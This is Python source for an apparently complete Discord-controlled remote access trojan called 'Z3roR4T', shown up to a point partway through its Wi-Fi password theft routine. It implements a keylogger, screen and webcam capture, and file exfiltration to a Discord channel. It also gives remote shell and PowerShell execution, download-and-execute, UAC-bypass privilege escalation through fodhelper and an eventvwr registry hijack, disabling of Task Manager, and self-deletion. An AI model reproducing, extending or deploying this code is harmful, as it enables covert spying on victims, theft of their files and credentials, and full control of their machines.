import discord
from discord.ext import commands
import pyautogui
import os
import shutil
import subprocess
import requests
import io
import time
import threading
import asyncio
import logging
import socket
import platform
import psutil
import cv2
import ctypes
import pyttsx3
from pynput.keyboard import Controller as KeyboardController, Key, Listener
from pynput.mouse import Controller as MouseController, Button
from PIL import Image
from PyQt6.QtWidgets import QApplication, QWidget, QLabel, QPushButton, QVBoxLayout, QHBoxLayout, QLineEdit
from ctypes import cast, POINTER
from comtypes import CLSCTX_ALL
from pycaw.pycaw import AudioUtilities, IAudioEndpointVolume
import sys
import psutil
import random
import pygetwindow as gw
import win32api
import win32con
import win32gui
import win32process
import win32clipboard
import win32file
import win32com.client
import re
import winreg
import numpy as np
import sounddevice as sd
import wave
import pygame
import pyaudio
import urllib.request
import zipfile
import winshell
import winreg
import wmi

logging.basicConfig(level=logging.INFO)

# Устанавливаем префикс команд и создаем объект бота
intents = discord.Intents.default()
intents.message_content = True  # Для получения сообщений
mouse = MouseController()

bot = commands.Bot(command_prefix="!", intents=intents)

# Путь для хранения временных файлов
appdata_path = os.path.expanduser("~") + "\\AppData\\Local\\Temp"
token = '{TOKEN}'
AUTHORIZED_CHANNEL_ID = {ACESS}  # Замените на ID вашего канала

# keyboard
key_buffer = []
log = []  # Лог для хранения строк
keyboard_listener = None  # Флаг для работы слушателя
keyboard_task = None  # Задача для обновления сообщений
latest_message = None  # Ссылка на последнее сообщение бота

KEY_LAYOUTS = {
    0x409: "eng",  # Английский
    0x419: "rus"   # Русский
}

# Таблицы перевода символов для разных языков
ENG_TO_RUS = str.maketrans(
    "qwertyuiop[]asdfghjkl;'zxcvbnm,.",
    "йцукенгшщзхъфывапролджэячсмитьбю"
)
RUS_TO_ENG = str.maketrans(
    "йцукенгшщзхъфывапролджэячсмитьбю",
    "qwertyuiop[]asdfghjkl;'zxcvbnm,."
)

current_path = "C:/"

@bot.event
async def on_ready():
    # Получаем информацию о ПК и пользователе
    pc_name = socket.gethostname()
    username = os.getlogin()
    file_name = os.path.basename(sys.argv[0])
    
    # Формируем сообщение
    message = f"**👋PC**: {pc_name}\n**👤User**: {username}\n**📁File**: {file_name} \n**✨ https://dsc.gg/ZeroTiss**"
    
    # Отправляем сообщение в канал
    channel = bot.get_channel(AUTHORIZED_CHANNEL_ID)
    if channel:
        await channel.send(message)

# Функция для захвата скриншота
def capture_screen():
    screenshot = pyautogui.screenshot()
    return screenshot

#--------------------------------keyboard

def get_current_language():
    """Определяет текущий язык ввода."""
    hwnd = win32gui.GetForegroundWindow()  # Получаем активное окно
    thread_id, _ = win32process.GetWindowThreadProcessId(hwnd)  # Получаем ID потока окна
    layout = win32api.GetKeyboardLayout(thread_id)  # Получаем раскладку клавиатуры
    lang_code = layout & (2**16 - 1)
    
    KEY_LAYOUTS = {
        0x409: "eng",  # Английский
        0x419: "rus"   # Русский
    }
    
    return KEY_LAYOUTS.get(lang_code, "eng")  # По умолчанию английский
def on_press(key):
    """Обработчик нажатий клавиш."""
    global log
    try:
        current_lang = get_current_language()  # Определяем текущий язык

        if hasattr(key, 'char') and key.char:
            char = key.char
            if current_lang == "rus":
                char = char.translate(ENG_TO_RUS)  # Конвертируем английские символы в русские
            key_buffer.append(char)

        elif key == key.space:
            key_buffer.append(" ")

        elif key == key.enter:
            log.insert(0, ''.join(key_buffer) + " [Enter]")
            key_buffer.clear()

        elif key == key.backspace and key_buffer:
            key_buffer.pop()

    except Exception as e:
        print(f"Ошибка: {e}")

def start_keyboard_listener():
    """Запуск слушателя клавиатуры."""
    global keyboard_listener
    if keyboard_listener is None:
        keyboard_listener = Listener(on_press=on_press)
        keyboard_listener.start()

def stop_keyboard_listener():
    """Остановка слушателя."""
    global keyboard_listener
    if keyboard_listener:
        keyboard_listener.stop()
        keyboard_listener = None

async def update_keyboard_log(ctx):
    """Обновление сообщения с логами клавиатуры."""
    global latest_message
    while keyboard_listener:
        if log:
            captured_text = "\n".join(log[:10])
            if latest_message:
                try:
                    await latest_message.edit(content=f"⌨️ Listener:\n```\n{captured_text}\n```")
                except discord.errors.NotFound:
                    latest_message = await ctx.send(f"⌨️ Listener:\n```\n{captured_text}\n```")
            else:
                latest_message = await ctx.send(f"⌨️ Listener:\n```\n{captured_text}\n```")
        await asyncio.sleep(1)

@bot.command()
async def keyboard(ctx, mode: str):
    """Включение/выключение захвата клавиатуры."""
    global keyboard_task, latest_message

    if ctx.channel.id != AUTHORIZED_CHANNEL_ID:
        return await ctx.send("❌ Unauthorized channel!")

    if mode.lower() == "on":
        key_buffer.clear()
        log.clear()
        start_keyboard_listener()
        latest_message = await ctx.send("⌨️ Keyboard listener started.")

        if keyboard_task is None:
            keyboard_task = asyncio.create_task(update_keyboard_log(ctx))

    elif mode.lower() == "off":
        stop_keyboard_listener()
        if keyboard_task:
            keyboard_task.cancel()
            keyboard_task = None

        if log:
            captured_text = "\n".join(log[:10])
            await ctx.send(f"⌨️ Final log:\n```\n{captured_text}\n```")
        else:
            await ctx.send("⌨️ No keys captured.")

    else:
        await ctx.send("❌ Invalid usage! Use `!keyboard on` or `!keyboard off`.")

#--------------------------------keyboard


#--------------------------------new

@bot.command()
async def sendtext(ctx, *, text: str):
    """Эмулирует ввод текста на клавиатуре."""
    if ctx.channel.id != AUTHORIZED_CHANNEL_ID:
        await ctx.send('❌ Unauthorized channel!')
        return

    keyboard = KeyboardController()  # Убедимся, что объект клавиатуры создан

    for char in text:
        keyboard.type(char)
        await asyncio.sleep(0.05)  # Небольшая задержка для естественного ввода

    await ctx.send(f'✅ Pasted text: `{text}`')

@bot.command()
async def changelang(ctx):
    """Меняет язык клавиатуры (Alt + Shift)."""
    if ctx.channel.id != AUTHORIZED_CHANNEL_ID:
        await ctx.send('❌Unauthorized channel!')
        return
    keyboard.press(Key.alt)
    keyboard.press(Key.shift)
    keyboard.release(Key.shift)
    keyboard.release(Key.alt)
    await ctx.send('✅ Changed Language')

mouse_control_sessions = {}

@bot.command()
async def mousemove(ctx, speed: int = 20):
    """Включает управление мышкой через стрелки в Discord."""
    if ctx.channel.id != AUTHORIZED_CHANNEL_ID:
        await ctx.send('❌Unauthorized channel!')
        return
    if ctx.author.id in mouse_control_sessions:
        await ctx.send('⚠️ Mouse is alredy active!')
        return
    
    view = discord.ui.View()
    directions = {'⬅️': (-speed, 0), '➡️': (speed, 0), '⬆️': (0, -speed), '⬇️': (0, speed)}
    
    async def move_callback(interaction, dx, dy):
        if interaction.user.id == ctx.author.id:
            mouse.move(dx, dy)
            await interaction.response.defer()
    
    for emoji, (dx, dy) in directions.items():
        button = discord.ui.Button(emoji=emoji, style=discord.ButtonStyle.primary)
        button.callback = lambda i, dx=dx, dy=dy: move_callback(i, dx, dy)
        view.add_item(button)
    
    left_click = discord.ui.Button(label='ЛКМ', style=discord.ButtonStyle.success)
    async def left_click_callback(interaction):
        if interaction.user.id == ctx.author.id:
            mouse.click(Button.left)
            await interaction.response.defer()
    left_click.callback = left_click_callback
    view.add_item(left_click)
    
    right_click = discord.ui.Button(label='ПКМ', style=discord.ButtonStyle.success)
    async def right_click_callback(interaction):
        if interaction.user.id == ctx.author.id:
            mouse.click(Button.right)
            await interaction.response.defer()
    right_click.callback = right_click_callback
    view.add_item(right_click)
    
    close_button = discord.ui.Button(label='X', style=discord.ButtonStyle.danger)
    async def close_callback(interaction):
        if interaction.user.id == ctx.author.id:
            mouse_control_sessions.pop(ctx.author.id, None)
            await interaction.message.delete()
    close_button.callback = close_callback
    view.add_item(close_button)
    
    mouse_control_sessions[ctx.author.id] = view
    await ctx.send('🎮 Mouse mover:', view=view)

#--------------------------------new


#--------------------------------FFMPEG


def capture_webcams():
    images = []
    index = 0
    while True:
        cap = cv2.VideoCapture(index)
        if not cap.isOpened():
            break  # Если камера не открывается, значит, больше их нет
        ret, frame = cap.read()
        if ret:
            _, img_encoded = cv2.imencode('.png', frame)
            images.append(io.BytesIO(img_encoded.tobytes()))
        cap.release()
        index += 1
    return images


# Функция для удаления файла
def delete_file(file_path):
    try:
        os.remove(file_path)
    except Exception as e:
        print(f"Error deleting file: {e}")

# Функция для выполнения файла
def execute_file(file_path):
    try:
        subprocess.run([file_path], check=True)
    except Exception as e:
        print(f"Error executing file: {e}")

# Команда для захвата скриншота с экрана
@bot.command()
async def photo_desk(ctx):
    if ctx.channel.id != AUTHORIZED_CHANNEL_ID:
        return await ctx.send("❌ Unauthorized channel!")
    
    screenshot = capture_screen()
    with io.BytesIO() as image_binary:
        screenshot.save(image_binary, "PNG")
        image_binary.seek(0)
        await ctx.send(file=discord.File(fp=image_binary, filename="screenshot.png"))

@bot.command()
async def photo_cam(ctx):
    if ctx.channel.id != AUTHORIZED_CHANNEL_ID:
        return await ctx.send("❌ Unauthorized channel!")
    
    images = capture_webcams()
    if not images:
        await ctx.send("❌ No webcam aviable!")
        return
    
    for i, image_binary in enumerate(images):
        image_binary.seek(0)
        await ctx.send(file=discord.File(fp=image_binary, filename=f"webcam_image_{i}.png"))

@bot.command()
async def upload(ctx, file_path: str):
    if ctx.channel.id != AUTHORIZED_CHANNEL_ID:
        return await ctx.send("❌ Unauthorized channel!")

    if not os.path.exists(file_path):
        return await ctx.send("❌ File not found!")

    try:
        await ctx.send(file=discord.File(file_path))  # Отправляем файл в Discord
        await ctx.send(f"✅ File `{os.path.basename(file_path)}` uploaded successfully!")
    except Exception as e:
        await ctx.send(f"❌ Error uploading file: {e}")

# Команда для удаления файла
@bot.command()
async def delete(ctx, file_path: str):
    if ctx.channel.id != AUTHORIZED_CHANNEL_ID:
        return await ctx.send("❌Unauthorized channel!")
    
    delete_file(file_path)
    await ctx.send(f"❌File {file_path} deleted")

# Команда для выполнения файла
@bot.command()
async def execute(ctx, file_path: str):
    if ctx.channel.id != AUTHORIZED_CHANNEL_ID:
        return await ctx.send("❌Unauthorized channel!")
    
    execute_file(file_path)
    await ctx.send(f"✅Executed file: {file_path}")


@bot.command()
async def download(ctx, url: str, path: str):
    if ctx.channel.id != AUTHORIZED_CHANNEL_ID:
        return await ctx.send("❌ Unauthorized channel!")
    
    try:
        response = requests.get(url, stream=True)
        with open(path, 'wb') as file:
            file.write(response.content)
        await ctx.send(f"✅ File downloaded to {path}")
    except Exception as e:
        await ctx.send(f"❌ Error downloading file: {e}")


# Команда для включения/выключения антивируса (место для вашей логики)
@bot.command()
async def acbypass(ctx, action: str):
    if ctx.channel.id != AUTHORIZED_CHANNEL_ID:
        return await ctx.send("❌Unauthorized channel!")
    
    if action == 'on':
        # Логика включения антивируса
        await ctx.send("✅Antivirus enabled.")
    elif action == 'off':
        # Логика отключения антивируса
        await ctx.send("❌Antivirus disabled.")
    else:
        await ctx.send("❌Invalid action. Use 'on' or 'off'.")

# Команда для самоуничтожения бота
@bot.command()
async def crash(ctx):
    if ctx.channel.id != AUTHORIZED_CHANNEL_ID:
        return await ctx.send("❌Unauthorized channel!")
    
    await ctx.send("👋Crashing bot code...")
    os.remove(os.path.realpath(__file__))  # Удаление скрипта
    exit()

#------diskcheck

@bot.command()
async def disk(ctx, *args):
    global current_path  # Используем глобальный текущий путь

    # Функция нормализации пути
    def normalize_path(path):
        return path.replace("\\", "/")

    if args:
        # Если передан путь, пробуем перейти к указанному
        new_path = os.path.join(current_path, " ".join(args))
        if os.path.isdir(new_path):
            current_path = new_path  # Обновляем текущий путь
        else:
            return await ctx.send(f"❌ path `{normalize_path(new_path)}` not found")

    try:
        items = os.listdir(current_path)  # Получаем список файлов и папок
        folders = [d for d in items if os.path.isdir(os.path.join(current_path, d))]  # Фильтруем папки
        files = [f for f in items if os.path.isfile(os.path.join(current_path, f))]  # Фильтруем файлы

        response = f"📂 **Data in {normalize_path(current_path)}**:\n"

        if folders:
            response += "\n📁 **Folders:**\n" + "\n".join(f"🔹 `{normalize_path(os.path.join(current_path, folder))}`" for folder in folders)
        else:
            response += "\n❌ No folders."

        if files:
            response += "\n\n📄 **Files:**\n" + "\n".join(f"📜 `{normalize_path(os.path.join(current_path, file))}`" for file in files)
        else:
            response += "\n\n❌ No files."

        await ctx.send(response)

    except Exception as e:
        await ctx.send(f"❌ Error: {e}")

#------diskcheck

@bot.command()
async def helprat(ctx):
    if ctx.channel.id != AUTHORIZED_CHANNEL_ID:
        return await ctx.send("❌ Unauthorized channel!")

    embed = discord.Embed(title="⭐ Z3roR4T Commands", color=discord.Color(0xFFFFFF))

    commands_dict = {
        "🛠 User interact": [
            "`!sendtext <text>` – Simulate keyboard input.",
            "`!mousemove` – Enable mouse movement control.",
            "`!changelang` – Switch keyboard language (Alt+Shift).",
            "`!keybind <key1>+<key2>` – Simulate key combination.",
            "`!textbox <text> <buttons>` – Create a textbox with buttons.",
            "`!msgbox <title> <text>` – Display a message box with text.",
        ],
        "🕵️ Spying": [
            "`!photo_desk` – Capture a screenshot of the desktop.",
            "`!photo_cam` – Take a photo using the webcam.",
            "`!video_desk` – Capture a screen recording.",
            "`!video_cam` – Record a video from the webcam.",
            "`!audiorec <microphone> <duration>` – Record audio from the microphone.",
            "`!keyboard <on/off>` – Enable/disable keylogger.",
            "`!clipboard <show/add>` – Get last clipboard or Add to clipboard.",
            "`!sysinfo` – Gets ALL info about PC.",
        ],
        "📂 File Management": [
            "`!upload <file_path>` – Upload a file from disk.",
            "`!delete <file_path>` – Delete a file from disk.",
            "`!execute <file_path>` – Execute a file.",
            "`!download <url> <destination>` – Download a file to disk.",
            "`!disk <path>` – Show files in the specified directory (default: C:/).",
            "`!autoload <name> <method> <on/off> - Adds program in AutoStartup",
        ],
        "💻 Windows Control": [
            "`!shutdown` – Shut down the PC.",
            "`!restart` – Restart the PC.",
            "`!lock` – Lock the screen.",
            "`!volume <0-100>` – Set system volume.",
            "`!lockmgr <on/off>` – Enable/disable Task Manager.",
            "`!achbypass <on/off>` – Enable/disable Windows Defender (if possible).",
            "`!unlocksound` - Unlocks sounds if its disabled on windows (may not work).",
            "`!Microlist` - sends a list of microphones in PC.",
        ],
        "🌐 Internet & Network": [
            "`!ping <site>` – Ping a website from the PC.",
            "`!packet <site>` – Send packets to a server.",
            "`!netinfo` – Display network information.",
            "`!wifipass` – Retrieve saved Wi-Fi passwords.",
        ],
        "🎨 Graphics & Fun": [
            "`!wallpaper <url>` – Changes wallpaper to URL Image.",
            "`!memz <On/Off>` – Enables MEMZ Effects [Safe version].",
            "`!invert <on/off>` – Enable/disable screen inversion. [⚠️Fixing]",
            "`!flipscreen <up/down/left/right/reset>` – Rotate the screen.",
            "`!cd` – Open/close CD tray.",
            "`!rickroll` – Play Rick Astley’s song in full screen.",
            "`!tts <text>` – Make Windows read text out loud.",
            "`!sound <url>` – Download and plays sound from url.",
            "`!shake <ins> <on/off>` – Shaking cursor.",
        ],
        "⚙️ Console & Processes": [
            "`!tasklist` – List running processes.",
            "`!taskkill <name>` – Kill a specific process.",
            "`!taskmake <task>` – Start a new process.",
            "`!cmd <command>` – Execute a CMD command.",
            "`!powershell <command>` – Execute a PowerShell command.",
            "`!bsod` – Executing BSOD.",
        ],
        "🛠 Admin & Other": [
            "`!checkadmin` – Check admin rights.",
            "`!admin <title> <icon_url> [method]` – Attempt admin privilege escalation.",
            "`!legitadmin` – Gain admin rights from a file.",
            "`!acbypass <on/off>` – Enable/Disable antivirus bypass [⚠️Fixing].",
            "`!suicide` – Self-destruct the bot [⚠️Fixing].",
        ],
    }

    for category, cmds in commands_dict.items():
        embed.add_field(name=category, value="\n".join(cmds), inline=False)

    embed.set_footer(text="Z3roR4T 😈 | Owner: Ewinnery | Version: 1.9")

    await ctx.send(embed=embed)

class TextBoxWindow(QWidget):
    def __init__(self, text, buttons, ctx):
        super().__init__()
        self.ctx = ctx
        self.setWindowTitle("Input Box")
        self.setGeometry(200, 200, 400, 200)
        self.input_text = ""

        layout = QVBoxLayout()
        self.label = QLabel(text)
        layout.addWidget(self.label)

        self.input_field = QLineEdit(self)
        layout.addWidget(self.input_field)

        btn_layout = QHBoxLayout()
        for btn_text in buttons:
            btn = QPushButton(btn_text, self)
            btn.clicked.connect(lambda _, b=btn_text: self.on_button_click(b))
            btn_layout.addWidget(btn)
        
        layout.addLayout(btn_layout)
        self.setLayout(layout)

    def on_button_click(self, btn_text):
        self.input_text = self.input_field.text()
        asyncio.run_coroutine_threadsafe(
            self.ctx.send(f"**Selected:** {btn_text}\n**Text:** {self.input_text}"), 
            bot.loop
        )
        self.close()

async def run_gui(text, buttons, ctx):
    app = QApplication(sys.argv)
    window = TextBoxWindow(text, buttons, ctx)
    window.show()
    app.exec()

@bot.command()
async def textbox(ctx, text: str, *buttons):
    if not buttons:
        buttons = ["OK"]  # Кнопка по умолчанию

    threading.Thread(target=asyncio.run, args=(run_gui(text, buttons, ctx),), daemon=True).start()

@bot.command()
async def shutdown(ctx):
    """Выключить ПК."""
    await ctx.send("💤Shutdown...")
    os.system("shutdown /s /t 0")

@bot.command()
async def restart(ctx):
    """Перезагрузить ПК."""
    await ctx.send("💫Restarting...")
    os.system("shutdown /r /t 0")

@bot.command()
async def lock(ctx):
    """Заблокировать экран."""
    await ctx.send("🔒Locked screen...")
    ctypes.windll.user32.LockWorkStation()

@bot.command()
async def tasklist(ctx):
    # Получаем все процессы
    processes = list(psutil.process_iter(attrs=['pid', 'name']))

    # Получаем список открытых окон
    open_windows = gw.getWindowsWithTitle('')
    visible_processes = [p for p in processes if any(p.info['name'].lower() in w.title.lower() for w in open_windows)]

    # Получаем 5-10 случайных фоновых процессов
    background_processes = [p for p in processes if p not in visible_processes]
    random_bg_processes = random.sample(background_processes, min(len(background_processes), 20))

    # Формируем список процессов
    tasklist_text = "--- Active Windows ---\n"
    for p in visible_processes[:20]:  # Показываем до 10 активных окон
        tasklist_text += f"🔹 {p.info['name']} (PID: {p.info['pid']})\n"

    tasklist_text += "\n--- Author: @Ewinnery ---\n"
    for p in random_bg_processes:  # Показываем 5-10 фоновых процессов
        tasklist_text += f"🔸 {p.info['name']} (PID: {p.info['pid']})\n"

    # Отправляем в Discord
    await ctx.send(f"```{tasklist_text}```")


@bot.command()
async def taskkill(ctx, *, name: str):
    """Закрыть процесс по имени."""
    result = subprocess.run(["taskkill", "/F", "/IM", name], capture_output=True, text=True)
    if "SUCCESS" in result.stdout:
        await ctx.send(f"💀{name} Killed!")
    else:
        await ctx.send(f"💀 Trying to kill... {name}")

@bot.command()
async def volume(ctx, level: int):
    """Установить громкость (0-100)."""
    if 0 <= level <= 100:
        devices = AudioUtilities.GetSpeakers()
        interface = devices.Activate(IAudioEndpointVolume._iid_, CLSCTX_ALL, None)
        volume_control = cast(interface, POINTER(IAudioEndpointVolume))
        
        volume_control.SetMasterVolumeLevelScalar(level / 100, None)
        await ctx.send(f"Громкость установлена на {level}%")
    else:
        await ctx.send("Select 1-100 volume")

@bot.command()
async def msgbox(ctx, title: str, *, text: str):
    if ctx.channel.id != AUTHORIZED_CHANNEL_ID:
        return await ctx.send("❌ Unauthorized channel!")
    
    script = f'''
    Add-Type -AssemblyName PresentationFramework;
    [System.Windows.MessageBox]::Show('{text}', '{title}');
    '''
    
    try:
        subprocess.Popen(["powershell", "-Command", script], creationflags=subprocess.CREATE_NO_WINDOW)
        await ctx.send("✅ Sent MSGBOX.")
    except Exception as e:
        await ctx.send(f"❌ ERROR: {e}")


@bot.command()
async def tts(ctx, speed: int = 400, pitch: int = 0, *, text: str):
    """Произнести текст очень быстро и очень высоко."""
    engine = pyttsx3.init()
    
    # Максимальная скорость
    engine.setProperty('rate', min(speed, 500))  # Ограничиваем, чтобы не было слишком быстро

    # Попытка изменить голос (для повышения высоты тона)
    voices = engine.getProperty('voices')
    if pitch < len(voices):  
        engine.setProperty('voice', voices[pitch].id)
    
    engine.say(text)
    engine.runAndWait()
    
    await ctx.send(f"🔊 TTS Played at {speed} speed with pitch {pitch}.")

#---------CMD

@bot.command()
async def cmd(ctx, *, command: str):
    try:
        # Выполняем команду ТОЛЬКО если она существует
        if os.name == "nt":
            command = command.strip()
            if command == "ls":  # Если юзер ввёл 'ls' на Windows, заменяем на 'dir'
                command = "dir"
        
        # Выполняем команду с правильной кодировкой
        result = subprocess.run(command, shell=True, capture_output=True, text=True, encoding="cp866", errors="ignore")
        output = result.stdout if result.stdout else result.stderr

        if not output:
            output = "No output from command"

        await ctx.send(f"```{output[:1900]}```")  # Ограничение по длине сообщения
    except Exception as e:
        await ctx.send(f"❌Error: {e}")

#---------CMD

@bot.command()
async def taskmake(ctx, task: str):
    try:
        result = subprocess.run([task], shell=True, capture_output=True, text=True, encoding="cp866", errors="ignore")
        if result.returncode == 0:
            await ctx.send(f"✅`{task}` Started.")
        else:
            await ctx.send(f"❌Error `{task}`: {result.stderr}")
    except Exception as e:
        await ctx.send(f"❌Error: {e}")

@bot.command()
async def powershell(ctx, *, command: str):
    try:
        # Запуск команды в PowerShell
        result = subprocess.run(["powershell", "-Command", command], capture_output=True, text=True, encoding="cp866", errors="ignore")
        output = result.stdout if result.stdout else result.stderr

        if not output:
            output = "No output from command"

        await ctx.send(f"```{output[:1900]}```")  # Ограничение по длине сообщения
    except Exception as e:
        await ctx.send(f"❌Error: {e}")

@bot.command()
async def netinfo(ctx):
    try:
        local_ip_output = subprocess.run("ipconfig | findstr IPv4", shell=True, capture_output=True, text=True, encoding="cp866", errors="ignore").stdout
        public_ip_output = subprocess.run("nslookup myip.opendns.com resolver1.opendns.com", shell=True, capture_output=True, text=True, encoding="cp866", errors="ignore").stdout
        netstat_output = subprocess.run("netstat -ano", shell=True, capture_output=True, text=True, encoding="cp866", errors="ignore").stdout
        dns_cache_output = subprocess.run("ipconfig /displaydns", shell=True, capture_output=True, text=True, encoding="cp866", errors="ignore").stdout

        local_ips = re.findall(r'\d+\.\d+\.\d+\.\d+', local_ip_output)
        public_ips = re.findall(r'\d+\.\d+\.\d+\.\d+', public_ip_output)
        netstat_lines = netstat_output.splitlines()[:10]  # Ограничение вывода
        dns_cache_lines = dns_cache_output.splitlines()[:10]  # Ограничение вывода

        output = (
            f"Local IPs:\n" + "\n".join(local_ips) +
            f"\n\nPublic IPs:\n" + "\n".join(public_ips) +
            f"\n\nConnections:\n" + "\n".join(netstat_lines) +
            f"\n\nLast DNS connections:\n" + "\n".join(dns_cache_lines)
        )

        await ctx.send(f"```{output[:1900]}```")
    except Exception as e:
        await ctx.send(f"Ошибка: {e}")


@bot.command()
async def ping(ctx, site: str):
    try:
        result = subprocess.run(["ping", "-n", "4", site], capture_output=True, text=True, encoding="cp866", errors="ignore")
        output = result.stdout if result.stdout else result.stderr
        await ctx.send(f"```{output[:1900]}```")
    except Exception as e:
        await ctx.send(f"❌Error: {e}")

@bot.command()
async def packet(ctx, site: str, packets: int = None, strength: int = None):
    if packets is None or strength is None:
        await ctx.send("❌ **Incorrect!** Try: `!packet <сайт> <кол-во пакетов> <размер пакета>`\n\n**True:**\n`!packet google.com 10 64`\n`!packet 8.8.8.8 5 128`")
        return
    
    try:
        result = subprocess.run(["ping", "-n", str(packets), "-l", str(strength), site], capture_output=True, text=True, encoding="cp866", errors="ignore")
        output = result.stdout if result.stdout else result.stderr
        
        sent_packets = len(re.findall(r'Ответ от', output))
        lost_packets = len(re.findall(r'Превышен интервал ожидания', output))
        
        detailed_output = (
            f"📡 **Ping results for {site}:**\n"
            f"🔹 **Sent Packets:** {sent_packets} / {packets}\n"
            f"❌ **Lost Packets:** {lost_packets}\n"
            f"💥 **Packet Strength:** {strength} bytes\n"
            f"📊 **Full Output:**\n```{output[:1500]}```"
        )
        await ctx.send(detailed_output)
    except subprocess.TimeoutExpired:
        await ctx.send("✅ Packets sent, but response timeout expired.")
    except Exception as e:
        await ctx.send(f"❌ Error: {e}")

@bot.command()
async def admin(ctx, title: str = None, icon_url: str = None, method: str = "uac"):
    if ctx.channel.id != AUTHORIZED_CHANNEL_ID:
        return await ctx.send("❌ Unauthorized channel!")
    
    supported_formats = [".png", ".ico", ".jpg", ".jpeg"]
    methods = ["uac", "schtask", "bypass", "eventvwr", "slui", "silent"]
    
    if not title or not icon_url or method not in methods:
        return await ctx.send(f"❌ Incorrect command usage! Use: `!admin <title> <icon_url> <method>`\nSupported icon formats: {', '.join(supported_formats)}\nMethods: {', '.join(methods)}")
    
    if not any(icon_url.endswith(ext) for ext in supported_formats):
        return await ctx.send(f"❌ Unsupported icon format! Supported formats: {', '.join(supported_formats)}")
    
    if method == "uac":
        script = 'Start-Process -FilePath "powershell" -ArgumentList "-Command Start-Process powershell -Verb runAs"'
    elif method == "schtask":
        script = f'Schtasks /Create /TN "{title}" /TR "powershell -Command Start-Process powershell -Verb runAs" /SC ONCE /ST 00:00 /RL HIGHEST & Schtasks /Run /TN "{title}"'
    elif method == "bypass":
        script = 'Start-Process -FilePath "C:\\Windows\\System32\\fodhelper.exe"'
    elif method == "eventvwr":
        try:
            key = winreg.HKEY_CURRENT_USER
            subkey = r"Software\\Classes\\mscfile\\shell\\open\\command"
            winreg.CreateKey(key, subkey)
            registry_key = winreg.OpenKey(key, subkey, 0, winreg.KEY_WRITE)
            winreg.SetValueEx(registry_key, None, 0, winreg.REG_SZ, f'cmd.exe /k powershell -Command Start-Process powershell -Verb runAs')
            winreg.CloseKey(registry_key)
            script = 'Start-Process -FilePath "eventvwr.exe"'
        except Exception as e:
            return await ctx.send(f"❌ Failed to modify registry: {e}")
    elif method == "slui":
        script = 'Start-Process -FilePath "C:\\Windows\\System32\\slui.exe"'
    elif method == "silent":
        script = '''
        $obj = New-Object -ComObject Shell.Application;
        $obj.ShellExecute("powershell", "-Command Start-Process powershell -Verb runAs", "", "runas", 1);
        '''
    
    try:
        subprocess.run(["powershell", "-Command", script], shell=True)
        await ctx.send(f"✅ Admin rights requested using method: {method}\nTitle: {title}, Icon: {icon_url}")
    except Exception as e:
        await ctx.send(f"❌ Failed to request admin rights: {e}")

@bot.command()
async def legitadmin(ctx):
    if ctx.channel.id != AUTHORIZED_CHANNEL_ID:
        return await ctx.send("❌ Unauthorized channel!")
    
    if not ctypes.windll.shell32.IsUserAnAdmin():
        await ctx.send("🔄 Requesting admin rights...")
        try:
            script = f'PowerShell -Command "Start-Process python -ArgumentList \'{sys.argv[0]}\' -Verb RunAs"'
            subprocess.run(script, shell=True)
            sys.exit()
        except Exception as e:
            await ctx.send(f"❌ Failed to request admin rights: {e}")
    else:
        await ctx.send("✅ Already running with admin rights!")



@bot.command()
async def checkadmin(ctx):
    if ctx.channel.id != AUTHORIZED_CHANNEL_ID:
        return await ctx.send("❌ Unauthorized channel!")
    
    checks = []
    
    # Проверка через net session
    try:
        result = subprocess.run("net session", shell=True, capture_output=True, text=True, encoding="cp866", errors="ignore")
        if result.returncode == 0:
            checks.append("✅ Net session: Admin rights confirmed.")
        else:
            checks.append("❌ Net session: No admin rights.")
    except:
        checks.append("❌ Net session: Error running command.")
    
    # Проверка записи в системную папку
    try:
        test_path = "C:\\Windows\\Temp\\test_admin.txt"
        with open(test_path, "w") as f:
            f.write("admin_check")
        os.remove(test_path)
        checks.append("✅ File write test: Admin rights confirmed.")
    except:
        checks.append("❌ File write test: No admin rights.")
    
    # Проверка через whoami /priv
    try:
        result = subprocess.run("whoami /priv", shell=True, capture_output=True, text=True, encoding="cp866", errors="ignore")
        if "SeShutdownPrivilege" in result.stdout:
            checks.append("✅ Whoami priv: Admin rights confirmed.")
        else:
            checks.append("❌ Whoami priv: No admin rights.")
    except:
        checks.append("❌ Whoami priv: Error running command.")
    
    # Проверка чтения реестра с админ-правами
    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion", 0, winreg.KEY_READ) as key:
            checks.append("✅ Registry read: Admin rights confirmed.")
    except:
        checks.append("❌ Registry read: No admin rights.")
    
    # Проверка выполнения fsutil (только админ может)
    try:
        result = subprocess.run("fsutil dirty query C:", shell=True, capture_output=True, text=True, encoding="cp866", errors="ignore")
        if "is NOT Dirty" in result.stdout or "is Dirty" in result.stdout:
            checks.append("✅ Fsutil: Admin rights confirmed.")
        else:
            checks.append("❌ Fsutil: No admin rights.")
    except:
        checks.append("❌ Fsutil: Error running command.")
    
    await ctx.send("\n".join(checks))

#---------------------------NEW FUCNTIONS----------------------------------

@bot.command()
async def keybind(ctx, keys: str):
    if ctx.channel.id != AUTHORIZED_CHANNEL_ID:
        return await ctx.send("❌ Unauthorized channel!")
    try:
        keys = keys.replace("+", " ")
        subprocess.run(["powershell", "-Command", f"(New-Object -ComObject WScript.Shell).SendKeys('{keys}')"], creationflags=subprocess.CREATE_NO_WINDOW)
        await ctx.send("✅ Keybind executed.")
    except Exception as e:
        await ctx.send(f"❌ ERROR: {e}")

@bot.command()
async def lockmgr(ctx, state: str):
    if ctx.channel.id != AUTHORIZED_CHANNEL_ID:
        return await ctx.send("❌ Unauthorized channel!")
    try:
        command = "reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v DisableTaskMgr /t REG_DWORD /d 1 /f" if state == "on" else "reg delete HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v DisableTaskMgr /f"
        subprocess.run(command, shell=True)
        await ctx.send(f"✅ Task Manager {'disabled' if state == 'on' else 'enabled'}.")
    except Exception as e:
        await ctx.send(f"❌ ERROR: {e}")

#-------wifipass

@bot.command()
async def wifipass(ctx):
    if ctx.channel.id != AUTHORIZED_CHANNEL_ID:
        return await ctx.send("❌ Unauthorized channel!")

    try:
        password_info = ""

        # Метод 1: Netsh
        try:
            result = subprocess.run("chcp 65001 & netsh wlan show profiles", shell=True, capture_output=True, text=True, encoding="utf-8", errors="ignore")
            profiles = re.findall(r"Все профили пользователей\s*:\s*(.+)", result.stdout)
            
            if profiles:
                for profile in profiles:
                    profile = profile.strip()
